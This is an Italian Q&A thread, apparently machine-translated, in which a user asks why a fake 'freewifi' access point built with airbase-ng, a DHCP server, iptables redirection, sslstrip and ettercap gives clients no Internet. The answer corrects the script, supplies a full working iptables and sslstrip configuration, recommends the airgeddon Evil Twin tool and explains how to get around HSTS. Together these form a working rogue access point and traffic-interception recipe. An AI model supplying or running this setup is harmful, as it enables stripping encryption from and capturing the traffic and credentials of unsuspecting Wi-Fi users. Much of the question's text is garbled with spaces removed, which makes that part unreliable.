Impostazione di un AP falso - problema con iptables e server DNS

3

Sto cercando di impostare un AP falso usando suite aircrack-ng, server DHCP e amp; iptables.

Dopo creazione dell'AP falso :

airmon-ng start wlan1
airbase-ng -c 11 -e "freewifi" wlan1mon

inesecuzionelaconfigurazionediiptableseleregolediroutingat0(filebash):

#!/bin/shifconfigat0upifconfigat010.0.0.1netmask255.255.255.0echo1>/proc/sys/net/ipv4/ip_forwardiptables--flushiptables--tablenat--flushiptables--delete-chainiptables--tablenat--delete-chainiptables-PFORWARDACCEPTiptables-tnat-APREROUTING-ptcp--destination-port80-jREDIRECT--to-port10000iptables-tnat-APOSTROUTING-owlan0-jMASQUERADE

serverDHCPinesecuzione:/etc/init.d/isc-dhcp-serverstart

/etc/dhcp/dhpd.conffile:

authoritative;default-lease-time600;max-lease-time7200;subnet10.0.0.0netmask255.255.255.0{optionsubnet-mask255.255.255.0;optiondomain-name"freewifi";
    option routers 10.0.0.1;
    option domain-name-servers 194.90.0.1;
    range 10.0.0.10 10.0.0.20;
}

/ etc / default / isc-dhcp-server file:

Esecuzionedisslstripeettercap:

sslstrip-f-p-kettercap-p-u-T-q-iat0

Innanzitutto,nonvienefornitaalcunaconnessioneInternet,possocollegarmialmioAP"freewifi" e ho persino un indirizzo IP, ma non posso effettuare una connessione a Internet:

quindi, ho notato che ha Http s sull'indirizzo, sslstrip dovrebbe rimuovere i s da http s , quindi anche questo era strano.

Sospetto che forse ho un problema con il mio bridging (iptables), qualche aiuto?

Kali Linux.

    
posta eyal360 26.01.2017 - 14:01
fonte

1 risposta

3

Hai diversi problemi qui. Penso che l'access point e il dhcp siano ok. Parliamo di iptables e sslstrip.

su sslstrip, stai usando gli argomenti -f -p -k 10000 ma non ha senso ... la porta 10000 è predefinita. E per impostare la porta devi usare -l in modo da poterne evitare l'uso. Dovrebbe essere sslstrip -f -p -k e questo è tutto o puoi mettere sslstrip -f -p -k -l 10000 che è lo stesso.

Parlando di iptables e inoltro. echo 1 > /proc/sys/net/ipv4/ip_forward è ok. Il route add non ha senso. Hai già accesso a Internet su eth0 (credo), quindi non hai bisogno di un percorso per la falsa rete di ap. Ovviamente a0 ip deve essere un intervallo di rete diverso da eth0. Metti un intervallo ip diverso, ad esempio 172.16.0.0/24 per esempio o qualsiasi altro.

Ma l'ordine delle regole in iptables è importante. Il masquerading deve essere fatto alla fine. E hai un errore di battitura su ssl port. Hai messo 1000 invece di 10000 !!!! < - OP ha modificato la sua domanda e l'ha corretta.

Gli svuotamenti sono ok:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

E poi, se hai la politica generale FORWARD con ACCEPT, non ha senso fare regole FORWARD con -j ACCEPT come questo iptables --append FORWARD --in-interface at0 -j ACCEPT . Dimentica le regole su udp ... la navigazione web è tcp, quindi questo non è importante: iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 . L'unico punto per farlo è reindirizzare il traffico DNS al tuo server DNS ... Ma non riesco a vedere che hai un server DNS su questo esempio, quindi non ha senso.

Questo dovrebbe essere:

iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

E questo è tutto.

Quindi la compilazione finale è:

#!/bin/sh
ifconfig at0 up
ifconfig at0 192.168.1.129 netmask 255.255.255.128
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Ad ogni modo, posso consigliarti una sceneggiatura su cui sto collaborando che automatizza tutte queste cose ed è molto utile !. Ha molte funzionalità di FakeAP / Evil Twin: airgeddon . Provaci! è un buon script già incluso nei repository BlackArch, Wifislax e ArchStrike.

Buona fortuna! e ricorda di testare sslstrip devi usare gli URL senza inserire esplicitamente https . E Facebook è un brutto punto di partenza a causa dell'HSTS. Prova con outlook.com funziona! Per evitare che l'HSTS sia più avanzato, avrai bisogno di sslstrip2 (è chiamato anche sslstrip +) e avrai bisogno di un proxy + dns (un'altra caratteristica in arrivo di airgeddon che è già sviluppata ed è in fase di test, è in un ramo di sviluppo e forse questa settimana potrebbe essere nel master).

    
risposta data 27.01.2017 - 09:31
fonte

Leggi altre domande sui tag